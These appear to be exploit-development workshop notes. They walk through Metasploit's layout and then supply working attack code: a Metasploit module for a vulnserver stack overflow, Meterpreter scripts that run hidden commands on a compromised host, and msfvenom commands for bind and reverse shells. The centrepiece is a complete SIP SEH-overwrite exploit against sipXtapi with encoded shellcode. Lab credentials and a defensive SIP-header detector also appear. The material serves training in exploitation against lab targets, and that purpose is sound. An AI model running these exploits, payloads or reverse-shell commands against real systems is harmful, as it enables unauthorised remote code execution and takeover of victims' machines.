  825. Plugins
  826. External
  827. Data
  828. Tools
  829.  
  830. - Let's take a look inside the Metasploit directory and see what's the
  831. ---------------------------Type This-----------------------------------
  832. cd /usr/share/metasploit-framework/
  833. ls
  834. -----------------------------------------------------------------------
  835.  
  836.  
  837.  
  838. - Now let's take a look inside the Modules directory and see what's there.
  839. ---------------------------Type This-----------------------------------
  840. cd /usr/share/metasploit-framework/modules
  841. ls
  842. -----------------------------------------------------------------------
  843.  
  844.  
  845. The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
  846. not necessarily need to - have a shell or session started on a machine.
  847.  
  848. The exploits directory has our modules that we need to pop a shell on a box.
  849. The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses
  850. like Burp Suite
  851. - Let's take a look at the external directory
  852. ---------------------------Type This-----------------------------------
  853. cd /usr/share/metasploit-framework/external
  854. ls
  855. -----------------------------------------------------------------------
  856.  
  857. - Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
  858. ---------------------------Type This-----------------------------------
  859. cd /usr/share/metasploit-framework/data
  860. ls
  861. -----------------------------------------------------------------------
  862.  
  863. - For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
  864. brute-forcing.
  865. ---------------------------Type This-----------------------------------
  866. cd /usr/share/metasploit-framework/data/wordlists
  867. ls
  868. -----------------------------------------------------------------------
  869.  
  870. - The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
  871. once a session is created.
  872. ---------------------------Type This-----------------------------------
  873. cd /usr/share/metasploit-framework/data/meterpreter
  874. ls
  875. -----------------------------------------------------------------------
  876.  
  877. - The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
  878. like escalating privileges and dumping hashes.
  879.  
  880. These are being phased out, though, and post-exploitation modules are now preferred.
  881. The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
  882. find a bunch of different Ruby scripts that help us on a pentest, with things ranging from a script that creates a
  883. non-repeating pattern for building exploits, to a pattern offset script that finds where in the crash buffer we need
  884. to put our custom shellcode.
  885.  
  886. The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
  887. to do with other programs to make things like importing and exporting reports simple.
  888. Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
  889. the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
  890. modules we're going to have a better understanding of where everything needs to go.
  891. ---------------------------Type This-----------------------------------
  892. cd /usr/share/metasploit-framework/modules/exploits
  893. ls
  894. -----------------------------------------------------------------------
  895.  
  896.  
  897. - The exploits directory is split up into several different directories, each one housing exploits for different types
  898. of systems, e.g. Windows, Unix, OSX, dialup and so on.
  899. Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
  900. into categories of different types of services/programs, so that you can pick out an exploit specifically for the
  901. service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
  902. for us.
  903. ---------------------------Type This-----------------------------------
  904. cd /usr/share/metasploit-framework/modules/auxiliary/
  905. ls
  906. -----------------------------------------------------------------------
  907.  
  908.  
  909. - And a little further into the directory, let's take a look at what's in the scanner directory
  910. ---------------------------Type This-----------------------------------
  911. cd /usr/share/metasploit-framework/modules/auxiliary/scanner/
  912. ls
  913. -----------------------------------------------------------------------
  914.  
  915.  
  916. - And one more folder deeper into the structure, let's take a look in the portscan folder
  917. ---------------------------Type This-----------------------------------
  918. cd /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan
  919. ls
  920. -----------------------------------------------------------------------
  921.  
  922. - If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
  923. and report them back to us in a nice, easily readable format.
  924. ---------------------------Type This-----------------------------------
  925. cat tcp.rb
  926. -----------------------------------------------------------------------
  927.  
  928.  
  929. - Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
  930. once you have a session on a machine.
  931. Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
  932. succeeds.
  933. ---------------------------Type This-----------------------------------
  934. cd /usr/share/metasploit-framework/modules/payloads/
  935. ls
  936. -----------------------------------------------------------------------
  937.  
  938.  
  939. - There are three different types of payloads: singles, stagers, and stages. Each type of payload has a different
  940. use.
  941. Single payloads do everything you need in one piece, so they call a shell back to you and let you
  942. do everything once you have that shell calling back to you.
  943. Stagers are used when payload space is limited: the victim machine calls back to your attack box to get
  944. the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
  945. much space, since it only calls back to the attacking machine to have the rest of the payload sent to it; it is
  946. mainly used to download stage payloads.
  947.  
  948.  
  949. - Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
  950. shells.
  951. ---------------------------Type This-----------------------------------
  952. cd singles
  953. cd windows
  954. ls
  955. -----------------------------------------------------------------------
  956.  
  957.  
  958. - We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
  959. see what it actually does.
  960. ---------------------------Type This-----------------------------------
  961. cat adduser.rb
  962. -----------------------------------------------------------------------
  963.  
  964. Looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
  965. the new user "Metasploit" a password of "Metasploit$1". Further down in the file we can actually see the command that
  966. it gives Windows to add the user to the system.
  967.  
  968.  
  969. - Stagers just connect the victim machine back to yours to download the stage payload, usually as
  970.  
  971. windows/shell/bind_tcp or windows/shell/reverse_tcp.
  972. ---------------------------Type This-----------------------------------
  973. cd ../../stagers
  974. ls
  975. -----------------------------------------------------------------------
  976.  
  977.  
  978.  
  979. - Again, we can see that we have stagers for multiple systems and code types.
  980. ---------------------------Type This-----------------------------------
  981. ls windows/
  982. -----------------------------------------------------------------------
  983.  
  984.  
  985. As you can see, the stagers are mainly just there to connect to the victim, to set up a bridge between us and the victim
  986. machine, so we can upload or download our stage payloads and execute commands.
  987. Lastly, we can go to our stages directory to see which payloads are available for us to send over for use with
  988. our stagers...
  989. ---------------------------Type This-----------------------------------
  990. cd ../stages
  991. ls
  992. -----------------------------------------------------------------------
  993.  
  994.  
  995. Again, we can see that our stages are coded for particular operating systems and languages.
  996. We can take a look at shell.rb and see the shellcode that would be put into the payload staged on the
  997. victim machine; it is encoded to tell the victim machine where to connect back to and what commands to run,
  998. if any.
  999.  
  1000. - Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
  1001. already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
  1002. so we can impersonate other users on the system in hopes of elevating our privileges.
  1003. ---------------------------Type This-----------------------------------
  1004. cd ../../../post/
  1005. ls
  1006. cd windows/
  1007. ls
  1008. -----------------------------------------------------------------------
  1009.  
  1010.  
  1011. Inside the windows directory we can see all the post modules that can be run. Capture is a directory that holds all
  1012. the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
  1013. escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
  1014. possible out of it. The WLAN directory holds modules that can pull down WiFi access points that the victim has in
  1015. memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
  1016.  
  1017. ------------------------------
  1018.  
  1019.  
  1020.  
  1021.  
  1022.  
  1023.  
  1024.  
  1025.  
  1026. -----From your Linux attack host that can reach your Windows machine that is running vulnerver.exe------
  1027.  
  1028.  
  1029.  
  1030.  
  1031. ---------------------------Type This-----------------------------------
  1032.  
  1033. cd /usr/share/metasploit-framework/modules/exploits/windows/misc
  1034.  
  1035. nano vulnserv.rb
  1036. -------(paste the code below into this file)-------
  1037. #
  1038. #
  1039. # Quick Metasploit exploit for vulnserver.exe
  1040. # Written by: Joe McCray
  1041. # Email: joe@strategicsec.com
  1042. #
  1043. # Place this exploit in:
  1044. # /usr/share/metasploit-framework/modules/exploits/windows/misc
  1045. #
  1046. require 'msf/core'
  1047.  
  1048. class Metasploit3 < Msf::Exploit::Remote
  1049. include Msf::Exploit::Remote::Tcp
  1050. def initialize(info = {})
  1051. super(update_info(info,
  1052. 'Name' => 'Custom vulnerable server stack overflow',
  1053. 'Description' => %q{
  1054. This module exploits a stack overflow in an app called
  1055. vulnserver that is designed to teach simple exploitation.
  1056. },
  1057. 'Author' => [ 'Joe McCray' ],
  1058. 'DefaultOptions' =>
  1059. {
  1060. 'EXITFUNC' => 'process',
  1061. },
  1062. 'Payload' =>
  1063. {
  1064. 'Space' => 800,
  1065. 'BadChars' => "\x00\x20",
  1066. },
  1067. 'Platform' => 'win',
  1068.  
  1069. 'Targets' =>
  1070. [
  1071. [
  1072. 'Windows XP SP3 EN',
  1073. {
  1074. 'Ret' => 0x625011AF,
  1075. }
  1076. ],
  1077. ],
  1078. 'DefaultTarget' => 0,
  1079.  
  1080. 'Privileged' => false
  1081. ))
  1082.  
  1083. register_options(
  1084. [
  1085. Opt::RPORT(9999)
  1086. ], self.class)
  1087. end
  1088.  
  1089. def exploit
  1090. connect
  1091. sock.recv(1024)
  1092.  
  1093. p = "\x41" * 16
  1094. p << payload.encoded
  1095.  
  1096. hdr = "TRUN ."
  1097. boom = pattern_create(3000)
  1098. boom[2006, 4] = [target.ret].pack('V') # EIP value
  1099. boom[2010, p.length] = p
  1100.  
  1101. sploit = hdr + boom
  1102.  
  1103. sock.put(sploit)
  1104.  
  1105. handler
  1106. disconnect
  1107.  
  1108. end
  1109.  
  1110. end
  1111. ------------------end of copy/paste content --------------
  1112.  
  1113.  
  1114.  
  1115. ---------------------------Type This-----------------------------------
  1116. msfconsole
  1117.  
  1118.  
  1119.  
  1120. use exploit/windows/misc/vulnserv
  1121. set PAYLOAD windows/meterpreter/bind_tcp
  1122. set RHOST CHANGEME-TO-YOUR-WIN7-IP
  1123. set RPORT 9999
  1124. exploit
  1125. ----------------------------------------------------------------------
  1126.  
  1127.  
  1128. ################################
  1129. # Custom Meterpreter Scripting #
  1130. ################################
  1131.  
  1132. - In this lab we will be looking at how you can use some custom Meterpreter scripts to do more than what Metasploit
  1133. can offer. This will also show you the flexibility of the Meterpreter scripts.
  1134.  
  1135. - We're going to start off with a simple Hello World script first.
  1136.  
  1137. ---------------------------Type This-----------------------------------
  1138. echo 'print_status("Hello World")' > /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
  1139. -----------------------------------------------------------------------
  1140.  
  1141. - This next portion is up to you, exploit your test box and end up with a Meterpreter shell.
  1142.  
  1143. - Let's test out our helloworld.rb Meterpreter script.
  1144.  
  1145. ---------------------------Type This-----------------------------------
  1146. meterpreter> run helloworld
  1147. -----------------------------------------------------------------------
  1148.  
  1149. - So far so good, now we can build on this base. Let's add a couple more API calls to the script.
  1150.  
  1151. - Open /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb in your favorite editor and add the following
  1152.  
  1153. lines.
  1154. ---------------------------Type This-----------------------------------
  1155. vi /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
  1156. -----------------------------------------------------------------------
  1157.  
  1158. ---------------------------Paste This-----------------------------------
  1159. print_error("this is an error!")
  1160. print_line("this is a line")
  1161. -----------------------------------------------------------------------
  1162.  
  1163.  
  1164. - Now run the script:
  1165.  
  1166. meterpreter> run helloworld
  1167.  
  1168.  
  1169. - Now that we have the basics down, we're going to do something a little more exciting.
  1170. - The architecture to follow when creating these scripts goes as follows:
  1171.  
  1172. def getinfo(session)
  1173.   begin
  1174.     <stuff goes here>
  1175.   rescue ::Exception => e
  1176.     <stuff goes here>
  1177.   end
  1178. end
  1179.  
  1180. -----------------------------------------------------------------------
  1181. - Copy and paste the following code into our helloworld.rb script:
  1182. ---------------------------Paste This-----------------------------------
  1183. def getinfo(session)
  1184.   begin
  1185.     sysnfo = session.sys.config.sysinfo   # hash with keys such as 'OS' and 'Computer'
  1186.     runpriv = session.sys.config.getuid
  1187.     print_status("Getting system information ...")
  1188.     print_status("The target machine OS is #{sysnfo['OS']}")
  1189.     print_status("The computer name is #{sysnfo['Computer']} ")
  1190.     print_status("Script running as #{runpriv}")
  1191.   rescue ::Exception => e
  1192.     print_error("The following error was encountered #{e}")
  1193.   end
  1194. end
  1195.  
  1196. getinfo(client)
  1197. --------------------------------------------------------------------------
  1198.  
  1199.  
  1200. - Now run the script:
  1201. ---------------------------Type This-----------------------------------
  1202. meterpreter> run helloworld
  1203. -----------------------------------------------------------------------
  1204.  
  1205. - We can expand it by adding actual system commands to the script; let's look at how we can do this.
  1206.  
  1207. ---------------------------Paste This-----------------------------------
  1208. def list_exec(session,cmdlst)
  1209.   print_status("Running Command List ...")
  1210.   r=''
  1211.   session.response_timeout=120
  1212.   cmdlst.each do |cmd|
  1213.     begin
  1214.       print_status "running command #{cmd}"
  1215.       r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
  1216.       while(d = r.channel.read)
  1217.         # read the channel until the command's output is exhausted
  1218.         print_status("#{d}")
  1219.       end
  1220.       r.channel.close
  1221.       r.close
  1222.     rescue ::Exception => e
  1223.       print_error("Error Running Command #{cmd}: #{e.class} #{e}")
  1224.     end
  1225.   end
  1226. end
  1227.  
  1228. commands = [ "set",
  1229.              "ipconfig /all",
  1230.              "arp -a"]
  1231.  
  1232. list_exec(client,commands)
  1233. ------------------------------------------------------------------------
  1234.  
  1235.  
  1236. - Run the script:
  1237. ---------------------------Type This-----------------------------------
  1238. meterpreter> run helloworld
  1239. -----------------------------------------------------------------------
  1240.  
  1241. Note: Add all of the commands from the script below to your helloworld.rb script:
  1242. https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/meterpreter/winenum.rb
  1243.  
  1244.  
  1245.  
  1246.  
  1247. -----------------------------------------------------------------------
  1248. ###############
  1249. # Challenge 1 #
  1250. ###############
  1251. The exploits listed below are all simple stack overflows with the vulnerable application being available for download.
  1252. • http://www.exploit-db.com/exploits/17550/
  1253. • http://www.exploit-db.com/exploits/19266/
  1254. • http://www.exploit-db.com/exploits/18382/
  1255. • http://www.exploit-db.com/exploits/17527/
  1256. • http://www.exploit-db.com/exploits/15238/
  1257. • http://www.exploit-db.com/exploits/15231/
  1258. • http://www.exploit-db.com/exploits/14623/
  1259. • http://www.exploit-db.com/exploits/12152/
  1260. • http://www.exploit-db.com/exploits/11328/
  1261.  
  1262. Your challenge is to choose one of the exploits above, verify that it works on your target Windows host (if not, why does it not work?). Then re-write the script in the multiscript skeleton format like we did for the vulnserver and freefloat FTP exploits (meaning no less than 7 scripts).
  1263.  
  1264.  
  1265.  
  1266. ###############
  1267. # Challenge 2 #
  1268. ###############
  1269. Here is my SEH Overwrite walk-through script. See if it helps you with going through the challenge below.
  1270. http://45.63.104.73/SEH-Overwrite.zip
  1271.  
  1272. #######
  1273. # SEH #
  1274. #######
  1275.  
  1276. sipex0.py
  1277. ---------
  1278. 1. What are """ used for in Python
  1279. 2. How many bytes of data is being sent to the tag variable?
  1280. 3. How many bytes of data is being sent to the cseq variable?
  1281.  
  1282.  
  1283. sipex1.py
  1284. ---------
  1285. 1. What is sys.stderr.write?
  1286. 2. What is happening in line 29?
  1287. 3. What is happening in line 31?
  1288.  
  1289.  
  1290.  
  1291. sipex2.py
  1292. ---------
  1293. 1. What is happening in line 17?
  1294. 2. What is happening in line 18?
  1295. 3. What is the difference between read(), readline(), and readlines() in Python?
  1296.  
  1297.  
  1298.  
  1299. sipex3.py
  1300. ---------
  1301. 1. What is structured exception handler?
  1302. 2. What is happening in line 20?
  1303. 3. What is happening in line 21?
  1304. 4. What is happening in line 23?
  1305.  
  1306.  
  1307. sipex4.py
  1308. ---------
  1309. 1. What is happening in line 20?
  1310. 2. What is happening in line 21?
  1311. 3. What is happening in line 23?
  1312. 4. What is happening in line 25?
  1313. 5. What is happening in line 26?
  1314.  
  1315.  
  1316.  
  1317.  
  1318.  
  1319.  
  1320. The exploits listed below are all simple SEH overwrites with the vulnerable application being available for download.
  1321. SEH Overwrites:
  1322. • http://www.exploit-db.com/exploits/19625/
  1323. • http://www.exploit-db.com/exploits/17361/
  1324. • http://www.exploit-db.com/exploits/16101/
  1325. • http://www.exploit-db.com/exploits/15834/
  1326. • http://www.exploit-db.com/exploits/14195/
  1327. • http://www.exploit-db.com/exploits/11179/
  1328. • http://www.exploit-db.com/exploits/10973/
  1329. • http://www.exploit-db.com/exploits/10765/
  1330. • http://www.exploit-db.com/exploits/9596/
  1331. • http://www.exploit-db.com/exploits/8142/
  1332.  
  1333. Your challenge is to choose one of the exploits above, verify that it works on your target Windows host (if not, why does it not work?). Then re-write the script in the multiscript skeleton format like we did for the vulnserver and freefloat FTP exploits (meaning no less than 7 scripts).
  1334.  
  1335.  
  1336.  
  1337. ##################
  1338. # SEH Overwrites #
  1339. ##################
  1340.  
  1341. #################################################
  1342. # On our VictimXP Host (192.168.4.50) #
  1343. # Start sipXexPhone if it isn’t already running #
  1344. # Start WinDBG #
  1345. # Press “F6” and Attach to sipXexPhone.exe #
  1346. # Press “F5” to start the debugger #
  1347. #################################################
  1348.  
  1349.  
  1350.  
  1351.  
  1352.  
  1353. python sipex0.py 192.168.4.50
  1354. 0:003> dd eip
  1355. 0:003> dd esp
  1356. 0:003> !exchain
  1357. 0:003> dds esp
  1358. 0:003> dds
  1359.  
  1360. python sipex1.py 192.168.4.50
  1361. 0:003> dd eip
  1362. 0:003> dd esp
  1363. 0:003> !exchain
  1364. 0:003> g
  1365.  
  1366. When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.
  1367.  
  1368.  
  1369. python sipex2.py 192.168.4.50
  1370. 0:003> dd eip
  1371. 0:003> dd esp
  1372. 0:003> !exchain
  1373. 0:003> g
  1374.  
  1375.  
  1376. ***ssh into 192.168.4.81 user: strategicsec pass: strategicsec***
  1377. cd ~/toolz/metasploit/tools/exploit
  1378. ruby pattern_offset.rb 41346941     (we should see that SEH is at offset 252)
  1379.  
  1380.  
  1381.  
  1382. !load narly
  1383. !nmod
  1384.  
  1385. ***ssh into 192.168.4.81 user: strategicsec pass: strategicsec***
  1386. ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
  1387. cd /home/strategicsec/toolz/metasploit/
  1388. ./msfbinscan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
  1389.  
  1390.  
  1391. #########################################
  1392. # sipex3.py in Notepad++. #
  1393. # Set cseq = 252 #
  1394. # Set seh2 address to: 0x10015977 #
  1395. #########################################
  1396.  
  1397.  
  1398. python sipex3.py 192.168.4.50
  1399. 0:003> !exchain
  1400.  
  1401. python sipex4.py 192.168.4.50
  1402.  
  1403.  
  1404. nc 192.168.4.50 4444
  1405.  
  1406.  
  1407. -----------------------------------------------
  1408. Here is some quick syntax you can use for generating payloads:
  1409.  
  1410.  
  1411. Calc:
  1412. -----
  1413. msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
  1414.  
  1415.  
  1416. Bind Shell
  1417. ----------
  1418. msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00\x0A\x0D' -f python
  1419.  
  1420.  
  1421. Reverse Shell
  1422. -------------
  1423. msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f python
  1424.  
  1425.  
  1426. Javascript Payload:
  1427. -------------------
  1428. msfvenom -p windows/exec CMD=calc.exe -f js_le -e generic/none
  1429. msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -f js_le -e generic/none
  1430. msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -f js_le -e generic/none
  1431.  
  1432. --------------------------------------------------------------------------------------
  1433. #!/usr/bin/python2
  1434. # Remote Buffer Overflow in sipXtapi
  1435.  
  1436. import sys
  1437. import socket
  1438. import struct # for pack function
  1439.  
  1440. if len(sys.argv) < 2:
  1441.     sys.stderr.write("Usage: sipex.py <host>\n")
  1442.     sys.exit(1)
  1443.  
  1444. target = sys.argv[1]
  1445. tag = "\x42" * 20
  1446. source = "127.0.0.1"
  1447. target_port = 5060
  1448. user = "bad"
  1449.  
  1450. cseq = "A" * 252 # Replace with distance to SEH
  1451.  
  1452. seh1 = "\x90\x90\xEB\x04" # nop, nop, jmp+4
  1453. seh2 = struct.pack('<I', 0x10015977) # replace this with a pop/pop/ret addr
  1454.  
  1455. # Replace 0x42424242 with POP/POP/RET value 0x10015977 from ./msfbinscan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
  1456.  
  1457. # shellcode = "\xCC" * 300 # int 3 shellcode
  1458.  
  1459. shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
  1460. shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x48\x6a\x67"
  1461. shellcode += "\x58\x50\x30\x41\x31\x41\x42\x6b\x41\x41\x77\x32\x41\x42\x41\x32"
  1462. shellcode += "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x39\x6c\x41"
  1463. shellcode += "\x7a\x7a\x4b\x30\x4d\x6b\x58\x6b\x49\x6b\x4f\x59\x6f\x4b\x4f\x65"
  1464. shellcode += "\x30\x4e\x6b\x62\x4c\x57\x54\x51\x34\x6c\x4b\x31\x55\x45\x6c\x6c"
  1465. shellcode += "\x4b\x51\x6c\x47\x75\x33\x48\x63\x31\x6a\x4f\x6c\x4b\x52\x6f\x56"
  1466. shellcode += "\x78\x4e\x6b\x63\x6f\x61\x30\x64\x41\x6a\x4b\x53\x79\x4e\x6b\x35"
  1467. shellcode += "\x64\x4e\x6b\x73\x31\x7a\x4e\x46\x51\x59\x50\x4d\x49\x4e\x4c\x4b"
  1468. shellcode += "\x34\x59\x50\x53\x44\x34\x47\x4b\x71\x5a\x6a\x34\x4d\x37\x71\x79"
  1469. shellcode += "\x52\x5a\x4b\x4b\x44\x57\x4b\x70\x54\x57\x54\x65\x78\x73\x45\x6b"
  1470. shellcode += "\x55\x4e\x6b\x51\x4f\x45\x74\x47\x71\x7a\x4b\x30\x66\x4c\x4b\x54"
  1471. shellcode += "\x4c\x32\x6b\x6e\x6b\x41\x4f\x35\x4c\x54\x41\x6a\x4b\x53\x33\x56"
  1472. shellcode += "\x4c\x4e\x6b\x4b\x39\x62\x4c\x47\x54\x77\x6c\x52\x41\x4b\x73\x75"
  1473. shellcode += "\x61\x59\x4b\x53\x54\x6e\x6b\x43\x73\x70\x30\x4c\x4b\x51\x50\x56"
  1474. shellcode += "\x6c\x4e\x6b\x44\x30\x77\x6c\x4c\x6d\x4c\x4b\x43\x70\x35\x58\x31"
  1475. shellcode += "\x4e\x72\x48\x4e\x6e\x42\x6e\x76\x6e\x6a\x4c\x76\x30\x4b\x4f\x6b"
  1476. shellcode += "\x66\x42\x46\x62\x73\x52\x46\x73\x58\x65\x63\x30\x32\x41\x78\x72"
  1477. shellcode += "\x57\x33\x43\x47\x42\x31\x4f\x71\x44\x49\x6f\x7a\x70\x55\x38\x78"
  1478. shellcode += "\x4b\x78\x6d\x4b\x4c\x77\x4b\x50\x50\x6b\x4f\x4b\x66\x43\x6f\x6d"
  1479. shellcode += "\x59\x4b\x55\x50\x66\x6d\x51\x38\x6d\x43\x38\x57\x72\x42\x75\x71"
  1480. shellcode += "\x7a\x63\x32\x39\x6f\x4e\x30\x55\x38\x79\x49\x45\x59\x38\x75\x4e"
  1481. shellcode += "\x4d\x61\x47\x6b\x4f\x6a\x76\x73\x63\x70\x53\x66\x33\x43\x63\x36"
  1482. shellcode += "\x33\x41\x53\x71\x43\x70\x43\x43\x63\x4b\x4f\x5a\x70\x30\x66\x50"
  1483. shellcode += "\x68\x75\x41\x71\x4c\x50\x66\x42\x73\x4c\x49\x6d\x31\x7a\x35\x30"
  1484. shellcode += "\x68\x6e\x44\x34\x5a\x50\x70\x38\x47\x52\x77\x6b\x4f\x4e\x36\x70"
  1485. shellcode += "\x6a\x74\x50\x51\x41\x43\x65\x4b\x4f\x38\x50\x63\x58\x6d\x74\x6e"
  1486. shellcode += "\x4d\x56\x4e\x5a\x49\x31\x47\x69\x6f\x4a\x76\x53\x63\x30\x55\x4b"
  1487. shellcode += "\x4f\x6e\x30\x41\x78\x6a\x45\x37\x39\x4f\x76\x41\x59\x61\x47\x69"
  1488. shellcode += "\x6f\x48\x56\x46\x30\x70\x54\x73\x64\x73\x65\x39\x6f\x6e\x30\x4e"
  1489. shellcode += "\x73\x45\x38\x5a\x47\x33\x49\x6f\x36\x54\x39\x66\x37\x4b\x4f\x6b"
  1490. shellcode += "\x66\x42\x75\x4b\x4f\x58\x50\x61\x76\x33\x5a\x30\x64\x50\x66\x30"
  1491. shellcode += "\x68\x72\x43\x42\x4d\x4b\x39\x4b\x55\x63\x5a\x52\x70\x50\x59\x31"
  1492. shellcode += "\x39\x38\x4c\x6c\x49\x39\x77\x70\x6a\x52\x64\x4c\x49\x68\x62\x50"
  1493. shellcode += "\x31\x6f\x30\x4b\x43\x6f\x5a\x49\x6e\x50\x42\x46\x4d\x59\x6e\x50"
  1494. shellcode += "\x42\x44\x6c\x6d\x43\x4c\x4d\x33\x4a\x77\x48\x4c\x6b\x4e\x4b\x4c"
  1495. shellcode += "\x6b\x70\x68\x31\x62\x6b\x4e\x6d\x63\x72\x36\x6b\x4f\x70\x75\x30"
  1496. shellcode += "\x44\x39\x6f\x78\x56\x33\x6b\x52\x77\x51\x42\x73\x61\x62\x71\x50"
  1497. shellcode += "\x51\x33\x5a\x44\x41\x50\x51\x50\x51\x62\x75\x30\x51\x59\x6f\x78"
  1498. shellcode += "\x50\x70\x68\x6e\x4d\x4b\x69\x76\x65\x68\x4e\x50\x53\x6b\x4f\x39"
  1499. shellcode += "\x46\x33\x5a\x59\x6f\x4b\x4f\x34\x77\x4b\x4f\x78\x50\x4c\x4b\x51"
  1500. shellcode += "\x47\x6b\x4c\x6b\x33\x4b\x74\x45\x34\x6b\x4f\x4a\x76\x36\x32\x4b"
  1501. shellcode += "\x4f\x38\x50\x50\x68\x58\x70\x6d\x5a\x43\x34\x33\x6f\x66\x33\x79"
  1502. shellcode += "\x6f\x6e\x36\x4b\x4f\x4a\x70\x67"
  1503.  
  1504.  
  1505. cseq = cseq + seh1 + seh2 + shellcode
  1506.  
  1507. packet = """INVITE sip:user@{source} SIP/2.0\r
  1508. To: <sip:{target}:{target_port}>\r
  1509. Via: SIP/2.0/UDP {target}:3277\r
  1510. From: "PRANKCALLER" <sip:{target}:3277>;tag={tag}\r
  1511. Call-ID: 3121{target}\r
  1512. CSeq: {cseq}\r
  1513. Max-Forwards: 70\r
  1514. Contact: <sip:{source}:5059>\r
  1515. \r
  1516. """.format(source=source, target=target, target_port=target_port, tag=tag, cseq=cseq)
  1517.  
  1518. sys.stderr.write("Packet\n"+packet+"\n")
  1519.  
  1520. sys.stderr.write("Sending Packet to: " + target + "\n\n")
  1521.  
  1522. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1523.  
  1524. try:
  1525.     sock.connect((target, target_port))
  1526.     sock.sendall(packet + "\n")
  1527. except Exception as e:
  1528.     sys.stderr.write("Cannot send to "+str(target)+" : "+str(target_port)+" : "+str(e)+"!\n")
  1529. finally:
  1530.     sock.close()
  1531. sys.stderr.write("Sent.\n")
  1532.  
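From the defensive side, the packet above is easy to recognise on the wire: a legitimate CSeq value is a sequence number and a method name ("1 INVITE"), a handful of bytes long, while this one carries a few hundred bytes of filler, a handler address and shellcode. The following Python is an added example, not part of these notes or of the sipex scripts; it parses a SIP request's headers and flags any header value longer than a threshold. The 256-byte limit, the header names and the two sample INVITEs (one normal, one built in the same layout as the script's packet with 252 bytes of filler followed by 300 int3 bytes in CSeq) are all constructed here for illustration.

```python
#!/usr/bin/env python3
"""Flag SIP requests whose header values are implausibly long (added example)."""

# Assumed threshold: real CSeq/From/To values are tens of bytes, not hundreds.
MAX_HEADER_VALUE = 256


def parse_sip_headers(message):
    """Return (request_line, {lower-case header name: [values]}).

    Headers end at the first empty line (the body, if any, follows it) and
    header names are case-insensitive in SIP, so they are lower-cased here.
    """
    head = message.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    request_line = lines[0]
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # malformed line; a stricter parser could flag this too
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return request_line, headers


def oversized_headers(message, limit=MAX_HEADER_VALUE):
    """List (header name, value length) for every value longer than `limit`."""
    _, headers = parse_sip_headers(message)
    return [(name, len(value))
            for name, values in headers.items()
            for value in values
            if len(value) > limit]


def build_invite(cseq):
    """Constructed INVITE in the same layout as the script's packet."""
    return ("INVITE sip:user@127.0.0.1 SIP/2.0\r\n"
            "To: <sip:192.0.2.10:5060>\r\n"
            "Via: SIP/2.0/UDP 192.0.2.10:3277\r\n"
            "From: \"caller\" <sip:192.0.2.10:3277>;tag=abc123\r\n"
            "Call-ID: 3121192.0.2.10\r\n"
            "CSeq: " + cseq + "\r\n"
            "Max-Forwards: 70\r\n"
            "Contact: <sip:127.0.0.1:5059>\r\n"
            "\r\n")


# Constructed samples: a normal request and one shaped like the crash packet
# (252 bytes of filler up to the SEH record, then 300 int3 bytes).
BENIGN_INVITE = build_invite("1 INVITE")
SUSPECT_INVITE = build_invite("A" * 252 + "\xcc" * 300)


if __name__ == "__main__":
    for label, msg in (("benign", BENIGN_INVITE), ("suspect", SUSPECT_INVITE)):
        print(label, oversized_headers(msg))
```

The same check belongs in front of any SIP parser written in an unsafe language: reject or truncate a header value before copying it into a fixed-size buffer, which is exactly the step sipXtapi skipped.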
  1533.  
  1534.  
  1535. ---------------------------------------------------------------------------------------------
  1536.  
  1537. ###################################
  1538. # Stack Overflows with DEP Bypass #
  1539. ###################################
  1540.  
  1541. Reboot your target host and choose the "2nd" option for DEP.
  1542.  
  1543.  
  1544. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b
  1545.  
